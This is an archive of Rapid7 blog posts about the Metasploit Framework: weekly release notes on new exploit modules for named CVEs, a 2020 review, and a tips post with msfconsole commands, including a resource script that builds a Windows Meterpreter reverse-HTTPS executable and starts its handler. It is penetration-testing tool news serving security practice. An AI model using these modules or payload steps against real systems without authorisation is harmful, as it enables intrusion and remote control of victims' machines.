Tag Archives: Metasploit

Metasploit Wrap-Up

Post Syndicated from Louis Sato original https://blog.rapid7.com/2021/01/29/metasploit-wrap-up-96/

MobileIron MDM Hessian-Based Java Deserialization RCE

Metasploit Wrap-Up

Our very own wvu-r7 has added exploits/linux/http/mobileiron_mdm_hessian_rce, which exploits an ACL bypass in MobileIron MDM products to execute a Java deserialization attack using a Groovy gadget against a Hessian based endpoint. (CVE-2020-15505). MDM helps organizations manage and control all employees’ devices, requiring it to be publicly reachable to synchronize devices, making this an appealing target. This exploit has been included on the U.S. National Security Agency’s list of vulnerabilities known to be exploited by Chinese state-sponsored threat actors. More information about this exploit can be found here.

PEAR Archive_Tar < 1.4.11 Arbitrary File Write

exploits/multi/fileformat/archive_tar_arb_file_write has been added by gwillcox-r7, which adds support for CVE-2020-28949. CVE-2020-28949 is a vulnerability which affects the Archive_Tar plugin of the PEAR PHP development framework and is caused by Archive_Tar’s lack of validation of file stream wrappers contained within filenames, which for allows the writing of an arbitrary file containing user controlled content to an arbitrary location on disk.

Micro Focus UCMDB Java Deserialization Unauthenticated Remote Code Execution

Community contributor Pedro Ribeiro has added exploits/multi/http/microfocus_ucmdb_unauth_deser, which exploits two vulnerabilities CVE-2020-11853 and CVE-2020-11854, that when chained allow an attacker to achieve unauthenticated remote code execution in Micro Focus UCMDB. CVE-2020-11854 is the use of a hardcoded password for the "diagnostics" user, which allows attackers to log into UCMDB. CVE-2020-11853 takes advantage of the fact that after authentication, almost all of the UCMDB client’s communication is done using Java serialized objects, allowing an authenticated attacker to inject a malicious Java serialized object into a POST body to one of the vulnerable endpoints to achieve remote code execution as root or SYSTEM.

New modules (5)

Enhancements and features

  • PR #14383 by h00die added two new external module examples in python, one as an exploit module example and the other as an auxiliary example.
  • PR #14651 by bcoles updates msftidy to verify that all modules have a module description.
  • PR #14564 by adfoster-r7 updates internal Metasploit libraries to dependency inject the currently active module when performing tab completion for users.
  • PR #14432 by cn-kali-team adds a new function report_creds to the kiwi.rb and priv/password.rb Meterpreter libraries. This function ensures that credentials dumped via Kiwi or via the hashdump command are now appropriately captured in the creds database, allowing users to replay them later on, or attempt to crack them and obtain the plain text password.

Bugs fixed

  • PR #14664 by s1e2b3i4 applies a fix to auxiliary/scanner/ssh/ssh_enumusers.rb to ensure that error messages that occur when a user doesn’t exist on the target system, or whom can’t connect remotely, are not displayed unless the VERBOSE flag is set.
  • PR #14657 by jmartin-r7 updates Metasploit’s docker build process to download pip from an alternative Github download source now that python2 will no longer be available after January 30th 2021.
  • PR #14650 by bcoles updates local_exploit_suggester to correctly store rhost information in the database, as previously this would crash.
  • PR #14647 by zeroSteiner addresses a typo introduced in #14582 whereby non-existent value is used to populate the tab completion array for the run command of modules that support actions as commands, resulting in msfconsole crashing when tab completion was attempted. Users should now be able to do tab completion using the run command without errors.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2021/01/22/metasploit-wrap-up-95/

Metasploit Wrap-Up

Metasploit Wrapup

Windows print spooler vulnerability…again

Here we have bwatters-r7 coming in with an exploit for CVE-2020-1337, a patch bypass for a Windows print spooler elevation of privilege vulnerability that was exploited in the wild last year. The original vulnerability, CVE-2020-1048, garnered quite a bit of interest from the security community, in large part because the Windows print spooler is a legacy component that was abused as part of the Stuxnet attack. Alex Ionescu and Yarden Shafir, the researchers who discovered CVE-2020-1048, have a great write-up here if you’re looking for a deep dive.

The first patch that Microsoft released for CVE-2020-1048 uses a check to verify that the process creating a printer port targeting a location has privileges to write to that location. Unfortunately, that patch only checks the permissions when the port is created. The bypass utilized here simply creates the port pointing to a location the user can write
to. Then, after the printer port is created, it creates a symlink from
the location pointed to by the printer port to a second location. The check will pass because the link is only created after the check, but the link will be in place when the print takes place, so the file write will pass through and end up in the trusted location.

A very prompt fix

Chiggins gave us a fix for the msfconsole prompt with PR #14635. For those not in the know, you can set your prompt in the console with the set Prompt command. Thanks to Chiggins setting your prompt to the timestamp works again! So feel free to give it a go with set Prompt %T.

New Modules (1)

Enhancements and features

  • #14583 from dwelch-r7 This PR adds in the ability for framework to detect when a given nmap scan requires sudo privileges and re-runs nmap with sudo prompting the user in the typical way
  • #14621 from geyslan This PR reduces the size of the linux/x64/shell_bind_tcp_random_port payload and maintains the functionality.
  • #14630 from h00die Adds the hardcoded creds found in Zyxel devices to the unix creds files – as captured within CVE-2020-29583

Bugs Fixed

  • #14597 from arno01 Updates the modules/auxiliary/gather/external_ip.rb module to provide a valid default vhost setting
  • #14609 from dwelch-r7 A bug was fixed in the lib/msf/core/exploit/remote/http_client.rb and lib/msf/core/opt_http_rhost_url.rb libraries whereby if a user used a /etc/hosts entry for resolving a hostname to an IP address, the VHOST datastore variable would be set incorrectly. This has now been resolved by improving the logic of these two libraries and updating the spec checks accordingly.
  • #14632 from zomfg-zombie This fixes a compatibility issue with the OpenSMTPD MAIL FROM RCE exploit where it was failing to function when the target host’s shell uses a strictly POSIX compatible read utility as is the case in Ubuntu.
  • #14635 from Chiggins A bug was fixed in the lib/rex/ui/text/shell.rb library whereby users who used the %T character within their command prompts would not get the full timestamp information. A fix has been applied to address this regression so that users can now get the full timestamp information within their prompts.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2021/01/15/metasploit-wrap-up-94/

Commemorating the 2020 December Metasploit community CTF

Metasploit Wrap-Up

A new commemorative banner has been added to the Metasploit console to celebrate the teams that participated in the 2020 December Metasploit community CTF and achieved 100 or more points:

Metasploit Wrap-Up

If you missed out on participating in this most recent event, be sure to follow the Metasploit Twitter and Metasploit blog posts. If there are any future Metasploit CTF events, all details will be announced there!

If the banners aren’t quite your style, you can always disable them with the quiet flag:

msfconsole -q

Windows privilege escalation via Cloud Filter driver

Our very own gwillcox-r7 has created a new module for CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP, with credit to James Foreshaw for the initial vulnerability discovery and proof of concept. The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to December 2020, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker-controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any security checks that would otherwise prevent a normal user from being able to create files in directories they don’t have permissions to create files in.

This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one of the Meterpreter payloads, as doing so will allow them to subsequently escalate their new session from NETWORK SERVICE to SYSTEM by using Meterpreter’s getsystem command to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.

New Modules (3)

Enhancements and Features

  • #14562 from zeroSteiner Improves the readability of Meterpreter error messages by replacing the command ID with the command name
  • #14582 from zeroSteiner This adds the possibility to run post module actions as commands. This also consolidates and improves existing VSS modules into one new single module with multiple actions.
  • #14600 from zeroSteiner The FileSystem mixin has been reorganized and a number of function aliases have been added to assist developers in using the module. Additionally new YARD documentation has been added to better explain the functionality of several of the FileSystem mixin’s functions to assist developers in determining when to use these functions.
  • #14606 from bwatters-r7 This adds a banner commemorating all of the teams that participated in the Q4 2020 CTF.

Bugs Fixed

  • #14515 from timwr This fixes an issue with both cmd/unix/reverse_awk and cmd/unix/bind_awk payloads that were not correctly terminating when after a session was closed. This was causing endless session creations and high CPU consumption on the target.
  • #14605 from zeroSteiner This PR fixes an issue where the VHOST option was not being correctly populated when the RHOST option was a domain name
  • #14613 from adfoster-r7 Fixes a regression error with modules depending on NTLM such as cve_2019_0708_bluekeep
  • #14614 from zeroSteiner A bug within the module for CVE-2020-17136 occurred where a relative path was used instead of an absolute path when attempting to load the C# exploit exe. The code has been replaced with a call to File.expand_path() to allow the module to dynamically determine the full path to this file, allowing users to use the module regardless of which directory they are in when running msfconsole.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Sonny Gonzalez original https://blog.rapid7.com/2021/01/08/metasploit-wrap-up-93/

Struts2 Multi Eval OGNL RCE

Metasploit Wrap-Up

Our very own zeroSteiner added exploit/multi/http/struts2_multi_eval_ognl, which exploits Struts2 evaluating OGNL expressions in HTML attributes multiple times (CVE-2019-0230 and CVE-2020-17530). The CVE-2019-0230 OGNL chain for remote code execution requires a one-time chain to enable the RCE gadget, which is handled automatically by the module. The OGNL gadget chain for CVE-2020-17530 will echo the command output. Both chains use a simple mathematical expression to ensure that evaluation occurs. These vulnerabilities are application dependent, and the user does need to know which CVE they are targeting. Setting the NAME parameter appropriately and using the check method to ensure evaluation takes place inside an HTML attribute are key to successful exploitation.

JuicyPotato-like Windows privilege escalation exploit

Exploit module exploits/windows/local/bits_ntlm_token_impersonation was added by Metasploit contributor C4ssandre. It exploits BITS connecting to a local Windows Remote Management server (WinRM) at startup time. A fake WinRM server listening on port 5985 is started by a DLL loaded from a previous unprivileged meterpreter session. The fake server triggers BITS and then steals a SYSTEM token from the subsequent authentication request. The token is then used to start a new process and launch powershell.exe as the SYSTEM user. It downloads a malicious PowerShell script and executes it on a second local HTTP server, not writing any files to disk. The exploit is based on decoder’s PoC. It has been successfully tested on Windows 10 (10.0 Build 19041) 32 bits.

Pulse Connect Secure Gzip RCE

Metasploit contributor h00die added an exploit that targets Pulse Connect Secure server version 9.1R8 and earlier. The vulnerability was originally discovered by the NCC Group. It achieves authenticated remote code execution as root by uploading an encrypted config that contains an overwrite for a Perl template file. This module was made possible by rxwx, who shared the encryption code with the author. Admin credentials are required for successful root access. The module has been tested against server version 9.1R8.

New modules (8)

Enhancements and features

  • PR 14566 from zeroSteiner Module auxiliary/server/socks_proxy replaces modules/auxiliary/server/socks4a.rb and modules/auxiliary/server/socks5.rb.
  • PR 14538 from jmartin-r7 Improves Metasploit’s XML importer error messages when data is not Base64 encoded.
  • PR 14528 from zeroSteiner Clarifies Windows Meterpreter payloads description support of XP SP2 or newer.
  • PR 14522 from axxop Replaces the hardcoded default Shiro encryption key with a new datastore option that allows users to specify rememberMe cookie encryption key.
  • PR 14517 from timwr Changes the osx/x64/shell_reverse_tcp payload to be generated with Metasm and captures and sends STDERR to msfconsole.
  • PR 14509 from egypt This adds a Java target to the Apache Solr RCE exploit module and fixes several payload issues.
  • PR 14444 from dwelch-r7 Adds a couple of missing methods from the remote data services for adding and deleting routes.

Bugs fixed

  • PR 14589 from timwr Fixes a file download issue with the Android Meterpreter’s download command.
  • PR 14532 from bcoles Fixes a NoMethodError exception caused by the Msf::Post::Common mixin not being included in post/android/capture/screen.
  • PR 14530 from jmartin-r7 Fixes a failing test on macOS caused by IPv6 vs IPv4 result precedence.
  • PR 14475 from dwelch-r7 Fixes the EICAR canary check.
  • PR 14334 from Summus-git Fixes a x86 linux bind shell payloads socket closing bug.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit 2020 Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2020/12/30/metasploit-2020-wrap-up/

Metasploit 2020 Wrap-Up

2020 was certainly an interesting year. There were quite a few newsworthy events and some fantastic exploit content released. Let’s take a look at what 2020 meant for Metasploit.

Quick stats

Some quick statistics for Metasploit’s year.

  • 737 pull requests merged (and counting)
  • A net gain of +179 non-payload modules
  • 50 new Auxiliary modules
  • 134 new Exploit modules
  • 23 new Post modules
  • 2 CTFs hosted
  • 1 new version

Metasploit 6

The Metasploit team released version 6.0 of the framework over the summer. This major change brought quite a few improvements on two fronts: the Meterpreter transport protocol and SMBv3 support for client connections. Both of these offered transport encryption for common operations performed by Metasploit, providing better security for the users. Additionally, to showcase the SMBv3 support, Metasploit added a new module to perform agentless dumping of SAM hashes and LSA secrets (including cached creds) from remote Windows targets. The technique employed by this module has become very popular due to its reliability, and the native integration into the Metasploit Framework makes it easily accessible for users with all the related benefits like database and pivoting support.

CTFs

There were not one but two open CTFs hosted by the Metasploit team in 2020. These events invited the community to solve challenges in a fun and competitive environment. The most recent event included 1,903 users registered across 874 teams.

New module highlights

  • exploit/windows/local/anyconnect_lpe (CVE-2020-3153 & CVE-2020-3433) – This exploit module was an excellent example of a trend of patch bypasses this year. The module is capable of leveraging both the original vulnerability along with the bypass for maximum coverage.
  • exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move (CVE-2020-0787) – This exploit targeted Windows BITS to overwrite a DLL. Exploiting native services included on Windows is always useful, and the technique leveraged here to use the file system operation to obtain code execution was an interesting case.
  • post/multi/gather/enum_software_versions – It’s often important for users to know what is on a system they have compromised. This new module helps make that process simple by enumerating the installed software and their versions, allowing the user to identify interesting entries for exploitation or living-off-the-land techniques.
  • exploit/multi/misc/weblogic_deserialize_badattrval (CVE-2020-2555) – WebLogic is always a valuable target and deserialization vulnerabilities are quite reliable by nature. That combination makes this module particularly useful.
  • exploit/multi/misc/weblogic_deserialize_badattr_extcomp (CVE-2020-2883) – Another more recent WebLogic RCE that makes use of deserialization. Similar to CVE-2020-2555, this module is equally useful.
  • exploit/windows/local/cve_2020_0668_service_tracing (CVE-2020-0668) – Users can never have enough Windows LPE exploits, and this module offered another reliable vector. This module uses a simple DLL-based technique to obtain code execution from a file system operation.

SharePoint

Metasploit added its first exploits for the popular SharePoint platform since 2010. Four exploit modules were added, three leverage XML injection flaws while the fourth targets a server side include. These exploits leverage .NET deserialization to execute operating system commands, avoiding any kind of memory corruption and making exploitation relatively reliable. The .NET deserialization gadgets leveraged by these modules were also new in 2020. This functionality came in the form of a new library that even includes a command line tool for generating gadget chains for researchers.

Over the course of the year, there were some interesting patterns that were observable. In general, there seemed to have been an increase in vulnerabilities that were disclosed and related to an insufficient remediation for a previous vulnerability. These so-called patch bypasses seem to be indicative of the increasing complexity of vulnerabilities and their respective solutions. Additionally, there were multiple exploits added to Metasploit that leveraged vulnerable file system operations to obtain code execution on Windows. These LPEs used a combination of techniques that are becoming increasingly common including op-locks and junctions. Metasploit is working on better support for these primitives to facilitate exploitation of vulnerabilities that use them.

With all that the project accomplished in 2020, the team looks forward to what 2021 will hold. New features are being discussed, and as always, the module pipeline continues to flow. Our sincere gratitude goes to all the members of the community that contributed to the project this year.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

More HaXmas blogs

Metasploit Tips and Tricks for HaXmas 2020

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2020/12/23/metasploit-tips-and-tricks-for-haxmas-2020-2/

Metasploit Tips and Tricks for HaXmas 2020

For this year’s HaXmas, we’re giving the gift of Metasploit knowledge! We’ll cover a mix of old, new, or recently improved features that you can incorporate into your workflows. Some of our readers may already know these tips and tricks for using Metasploit, but for the others who aren’t aware of them, it’s your lucky day!

Debugging failed HTTP Modules

There’s nothing more upsetting than not getting a Meterpreter session due to the misconfiguration of module options. I have found that the quickest way to sanity-check failed HTTP Modules is to set the HTTPTrace option to true before running your module:

set HTTPTrace true

This will enable the logging of raw HTTP requests and responses:

msf6 > use scanner/http/title

msf6 auxiliary(scanner/http/title) > set RHOSTS 127.0.0.1

RHOSTS => 127.0.0.1

msf6 auxiliary(scanner/http/title) > set HttpTrace true

HttpTrace => true

msf6 auxiliary(scanner/http/title) > run

####################

# Request:

####################

GET / HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

####################

# Response:

####################

HTTP/1.0 200 OK

Server: SimpleHTTP/0.6 Python/2.7.16

Date: Wed, 16 Dec 2020 01:16:32 GMT

Content-type: text/html; charset=utf-8

Content-Length: 178

<!DOCTYPE html PUBLIC “-//W3C//DTD HTML 3.2 Final//EN”><html>

<title>Directory listing for /</title>

<body>

<h2>Directory listing for /</h2>

<hr>

<ul>

</ul>

<hr>

</body>

</html>

[+] [127.0.0.1:80] [C:200] [R:] [S:SimpleHTTP/0.6 Python/2.7.16] Directory listing for /

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf6 auxiliary(scanner/http/title) >

This is a great way to quickly see why your modules have failed. In some scenarios, you may find that you’ve simply forgotten to specify the TARGETURI or VHOST options correctly, and after rerunning the module, you might even have a session.

Inline run options

Did you know that you can inline Metasploit’s options when running a module? When paired with your terminal’s reverse-i-search ctrl+r capabilities, it can be a real time-saver when wanting to rerun Metasploit modules again with the same options:

msf6 > use scanner/http/title

msf6 auxiliary(scanner/http/title) > run RHOSTS=127.0.0.1

[+] [127.0.0.1:80] [C:200] [R:] [S:SimpleHTTP/0.6 Python/2.7.16] Directory listing for /

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf6 auxiliary(scanner/http/title) >

Providing inlined options can also be useful for quickly enabling the HttpTrace functionality or verbose mode of a module:

msf6 auxiliary(scanner/http/title) > run HttpTrace=true VERBOSE=true

####################

# Request:

####################

GET / HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

####################

# Response:

####################

HTTP/1.0 200 OK

Server: SimpleHTTP/0.6 Python/2.7.16

Date: Wed, 16 Dec 2020 01:16:32 GMT

Content-type: text/html; charset=utf-8

Content-Length: 178

<!DOCTYPE html PUBLIC “-//W3C//DTD HTML 3.2 Final//EN”><html>

<title>Directory listing for /</title>

<body>

<h2>Directory listing for /</h2>

<hr>

<ul>

</ul>

<hr>

</body>

</html>

[+] [127.0.0.1:80] [C:200] [R:] [S:SimpleHTTP/0.6 Python/2.7.16] Directory listing for /

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf6 auxiliary(scanner/http/title) >

This year, we improved on these capabilities even further, thanks to this pull request. Metasploit now supports tab completion for both option names and values, too! Just use the tab key on your keyboard and you’ll be good to go:

set <tab><tab>

set RHOSTS=<tab><tab>

Note that this is a lesser-used piece of Metasploit’s functionality, so if you run into any issues, be sure to create an issue and send the details our way.

Quickly interacting with new sessions

Metasploit provides support for quickling interacting with the most recently created session by using a session ID of -1, for instance:

msf6 > sessions -i -1

[*] Starting interaction with 4…

Note that this trick also works when running post modules:

use modules/post/multi/manage/screenshare

set SESSION -1

set SRVHOST vmnet8

set URIPATH /

run

But wait, there’s more! Thanks to this pull request a few years ago, you can save additional characters by omitting the -i flag when you want to interact with a session:

msf6 > sessions -1

[*] Starting interaction with 4…

meterpreter > sessions 1

[*] Backgrounding session 4..

[*] Starting interaction with 1…

Skipping msfvenom’s boot time

Name a more iconic duo than msfvenom and exploit/multi/handler. I’ll wait.

In the meantime, though, did you know that you can generate payloads and create handlers without even leaving the Metasploit console? Just open up Metasploit and run through the payload generation and handler creation steps directly from the payload module:

# Use the payload module:

use windows/meterpreter/reverse_https

set LHOST 127.0.0.1

set LPORT 4443

set SessionCommunicationTimeout 0

set ExitOnSession false

# Create the executable, as an alternative to msfvenom:

generate -o reverse_windows.exe -f exe

# Create a handler, as an alternative to exploit/multi/handler

to_handler

We’ve found that this workflow can be faster in comparison to using msfvenom directly, which can be slow in comparison to a warmed-up Metasploit console.

Resource scripts

Resource scripts are great for streamlining your repetitive workflows. For instance, if we wanted to turn the above workflow of "using a module, generating a particular payload, and creating a handler" into a reusable resource script, simply create a file my_workflow.rc with the commands that you’d like to run:

cat my_workflow.rc

use windows/meterpreter/reverse_https

set LHOST 127.0.0.1

set LPORT 4443

set SessionCommunicationTimeout 0

set ExitOnSession false

generate -o reverse_windows.exe -f exe

to_handler

Running a resource file from the command line is simple—just use the resource command. Metasploit will load this file, then execute each line one at time:

msf6 > resource /example/my_workflow.rc

[*] Processing /example/my_workflow.rc for ERB directives.

resource (/example/my_workflow.rc)> use windows/meterpreter/reverse_https

resource (/example/my_workflow.rc)> set LHOST 127.0.0.1

LHOST => 127.0.0.1

resource (/example/my_workflow.rc)> set LPORT 4443

LPORT => 4443

resource (/example/my_workflow.rc)> set SessionCommunicationTimeout 0

SessionCommunicationTimeout => 0

resource (/example/my_workflow.rc)> set ExitOnSession false

ExitOnSession => false

resource (/example/my_workflow.rc)> generate -o reverse_windows.exe -f exe

[*] Writing 73802 bytes to reverse_windows.exe…

resource (/example/my_workflow.rc)> to_handler

[*] Payload Handler Started as Job 2

By default Metasploit will run any resource scripts found within its config directory at ~/.msf4/msfconsole.rc, or you can even specify resource scripts to be run when msfconsole starts up. This can be useful for setting options such as global logging, or default LHOST values:

msfconsole -r /example/my_workflow.rc

Writing resource scripts can sometimes be a chore, which is why Metasploit also provides the ability to save recently executed commands directly to a specified resource script location:

# Viewing the makerc command usage:

msf6 > help makerc

Usage: makerc <output rc file>

Save the commands executed since startup to the specified file.

# Saving the last commands to reusable resource script:

msf6 > makerc example.rc

[*] Saving last 4 commands to examplerc …

For the power users of Metasploit, resource scripts also support the ability to run arbitrary Ruby code. This functionality makes it possible to interact directly with Metasploit’s Framework object programmatically:

use windows/meterpreter/reverse_https

&ltruby>

# Run arbitrary ruby code which can interact with the Metasploit framework object

puts “Currently running with Metasploit version: #{framework.version}!”

&lt/ruby>

If you didn’t know, there’s also a treasure trove of hidden resource scripts buried deep within Metasploit Framework repository that you may not be aware of: https://github.com/rapid7/metasploit-framework/tree/master/scripts/resource.

Refining search results

This year, we made improvements to the search functionality of Metasploit. Specifying additional search terms will now continue to refine your search results.

Previously, when using the command search postgresql login, all modules matching either postgresql or login would be returned:

msf6 > search postgresql login

Matching Modules

================

# Name Disclosure Date Rank Check Description

– —- ————— —- —– ———–

0 auxiliary/admin/appletv/appletv_display_image normal No Apple TV Image Remote Control

1 auxiliary/admin/appletv/appletv_display_video normal No Apple TV Video Remote Control

… many modules later …

248 post/windows/manage/sticky_keys normal No Sticky Keys Persistance Module

249 post/windows/manage/wdigest_caching normal No Windows Post Manage WDigest Credential Caching

Interact with a module by name or index, for example use 249 or use post/windows/manage/wdigest_caching

Now with the newly updated search command running search postgresql login – Metasploit will only return modules matching both postgresql and login:

msf6 > search postgresql login

Matching Modules

================

# Name Disclosure Date Rank Check Description

– —- ————— —- —– ———–

0 auxiliary/scanner/postgres/postgres_login normal No PostgreSQL Login Utility

Interact with a module by name or index, for example use 0 or use auxiliary/scanner/postgres/postgres_login

This functionality works well with the search keywords, too:

msf6 > search cve:2020 type:aux tomcat ghostcat

Matching Modules

================

# Name Disclosure Date Rank Check Description

– —- ————— —- —– ———–

0 auxiliary/admin/http/tomcat_ghostcat 2020-02-20 normal No Ghostcat

Interact with a module by name or index, for example use 0 or use auxiliary/admin/http/tomcat_ghostcat

Developing modules?

There are lots of great workflow capabilities built into Metasploit for our users, but there’s also a few useful tricks for developers!

Let’s start our journey with file reloading. It turns out that the best improvement to a developer’s productivity is the ability to reload files in Metasploit without having to close and reopen it. As a result, these commands will save you a lot of time:

  • reload: Reload the latest version of the active module from the file system.
  • reload_lib -a: Reload any changed files that are in your current Git working tree, other than modules. This is perfect for changing core library files.
  • reload_all: Reload all modules from all configured module paths.

There are also a few extra commands that you might find useful when modifying a developing a new Metasploit module:

  • rerun: After reloading the module the currently active module, run the run command.
  • recheck: After reloading the currently active module, run the check command.
  • edit: Edit the currently open module within your local editor. This can also edit arbitrary files edit <file_path>.

Finally, placing a breakpoint in your code can be a great way to immediately get to the root cause of issues. Just place the following snippet wherever you wish to enter into an interactive debugging environment:

require ‘pry’; binding.pry

This will pause the execution of the currently running code code when the breakpoint is hit:

Metasploit Tips and Tricks for HaXmas 2020

There are a lot of useful commands to help explore the issue from here, for instance:

  • backtrace: Show the current call stack
  • up / down: Navigate the call stack
  • step: Move forward by a single execution step
  • next: Move forward by a single line
  • whereami: Show the current breakpoint location again
  • help: View all of the available commands and options

Ruby’s runtime introspection can also be great to help with debugging. This will help you explore the available methods, classes, and variables within the current Ruby environment:

  • self: To find out what the current object is
  • self.methods: Find all available methods
  • self.methods.grep /send/: Searching for a particular method that you’re interested in. This can be great to explore unknown APIs.
  • self.method(:connect).source_location: Find out which file, and which line, defined a particular method
  • self.class.ancestors: For complex modules, this can be useful to see what mixins a Metasploit module is currently using

Even more tips!

Did you know that the Metasploit console has an inbuilt tips command? It will show you even more useful workflow tips to check out! See any tips that we’re missing? Simply create a pull request to help us improve the list:

Metasploit Tips and Tricks for HaXmas 2020

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

More HaXmas blogs

Metasploit Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2020/12/18/metasploit-wrap-up-92/

Metasploit Wrap-Up

It’s the week of December 17th and that can only mean one thing: a week until Christmas! For those of you who don’t celebrate Christmas, a very happy Hanukkah/Chanukah, Kwanzaa, Diwali, Chinese New Year, Winter Solstice and Las Posadas to you all!

This is our last weekly wrap-up this year, but as always, we’ll be publishing an annual Metasploit wrap-up just after the new year that covers all the shells we got in 2020.

Without further ado, let’s jump into it!

CVE-2020-1054: I heard you still got Windows 7, so let’s play a game

Oh dear Windows 7, you just can’t catch a break. timwr continued his LPE contributions this week with a exploit for CVE-2020-1054, a OOB write vulnerability via the DrawIconEx() function in win32k.sys. This bug was originally found by bee13oy of Qihoo 360 Vulcan Team and Netanel Ben-Simon and Yoav Alon of Check Point Research and was reported to Microsoft in May 2020. The module targets Windows 7 SP1 x64 and grants SYSTEM level code execution. Whilst Windows 7 is EOL, it is still being used by 17.68% of all Windows computers as of November 2020 according to some statistics. That is still a fair market share even if its popularity has been gradually diminishing over time. Furthermore, although users can update Windows 7, it is now mostly a manual process unless you are on one of Windows extended support plans. This increases the time needed to apply patches and also increases the possibility that users may forget to install specific patches. Hopefully none of your clients’ systems are still running Windows 7, but in case you are on a pen test and happen to encounter one, this exploit might provide the access you need to pivot further into the network.

Parse me to your shell

The second highlight of this week was a PR from our very own wvu-r7 targeting CVE-2020-14871, a buffer overflow within the parse_user_name() function of the PAM (Pluggable Authentication Module) component of Solaris SunSSH running on Oracle Solaris versions 10 and 11. The exploit supports SunSSH 1.1.5 running on solaris 10u11 1/13 (x86) within either VMWare or VirtualBox and grants unauthenticated users a shell as the root user. Pretty nifty stuff!

New modules (2)

Enhancements and features

Bugs fixed

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).